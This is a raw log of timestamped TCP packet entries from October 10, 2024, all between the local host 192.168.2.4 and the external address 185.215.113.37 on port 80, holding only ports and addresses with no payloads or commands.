Oct 10, 2024 18:23:17.499073982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499093056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499093056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499111891 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499162912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499172926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499190092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499205112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499219894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499249935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499249935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499413013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499423981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499440908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499453068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499469995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499475002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499475002 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499483109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499500036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499511957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499526978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499526978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499528885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499545097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499567986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499567986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499600887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499706984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499716043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499825954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499830961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499840021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499855995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499865055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499882936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499883890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499883890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499897957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499910116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499927998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.499939919 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499939919 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.499982119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500104904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500118017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500130892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500149965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500164986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500174999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500179052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500179052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500195026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500206947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500221014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500221014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500225067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500266075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500266075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500447989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500458002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500475883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500488043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500504017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500507116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500507116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500516891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500534058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500552893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500560045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500560045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500566006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500581980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500597000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500606060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500606060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500607967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500624895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500638962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500643969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500643969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500653982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500664949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500680923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500694036 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500696898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500696898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500710964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.500735044 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500735044 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.500783920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501096964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501106977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501128912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501142979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501159906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501159906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501220942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501282930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501300097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501312971 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501328945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501337051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501337051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501343012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501365900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501365900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501415014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501430035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501440048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501460075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501472950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501492023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501492023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501496077 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501513958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501528978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501528978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501529932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501543999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501559019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501559019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501559019 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501574039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501589060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501589060 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501647949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501825094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501835108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501916885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501930952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501943111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501950026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501950026 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501960039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501971960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.501979113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501979113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.501990080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502002001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502007008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502007008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502018929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502031088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502037048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502037048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502049923 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502064943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502064943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502146959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502216101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502226114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502243996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502257109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502273083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502274036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502274036 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502316952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502361059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502371073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502388000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502396107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.502414942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502414942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.502463102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543168068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543184042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543209076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543220997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543227911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543266058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543278933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543294907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543307066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543323040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543359995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543360949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543437004 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543494940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543509007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543529034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543540955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543540955 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543541908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543560982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.543584108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543584108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.543736935 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626554012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626636028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626647949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626648903 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626668930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626689911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626689911 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626725912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626739025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626743078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626773119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626773119 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626780033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626791954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626806974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626820087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626825094 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626826048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626889944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626899958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626924992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.626933098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626933098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.626995087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627084970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627095938 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627115011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627132893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627145052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627147913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627147913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627165079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627177954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627192020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627192020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627299070 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627351046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627372026 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627389908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627407074 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627407074 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627422094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627439976 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627450943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627454042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627454042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627471924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627487898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627499104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627499104 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627518892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627701044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627715111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627729893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627742052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627757072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627762079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627762079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627770901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627803087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627803087 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627839088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627852917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627866030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627882004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627885103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627885103 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627895117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627909899 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627913952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627913952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627923012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627938032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627942085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627942085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627950907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627966881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627971888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627971888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.627979040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627995014 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.627995968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628007889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628010988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628010988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628025055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628041983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628041983 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628061056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628628016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628637075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628644943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628659964 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628669977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628674984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628689051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628709078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628710032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628710032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628721952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628737926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628751040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628751040 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628751993 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628770113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628782034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628796101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628798962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628798962 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628808975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628823042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628835917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628844976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628845930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628854990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628866911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628881931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628889084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628889084 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628895044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628911972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628917933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628923893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628938913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628951073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.628952980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.628953934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629060984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629659891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629679918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629693031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629705906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629708052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629723072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629735947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629750013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629754066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629754066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629765987 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629775047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629791975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629791975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629791975 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:17.629803896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:17.629818916 CEST	80	49731	185.215.113.37	192.168.2.4
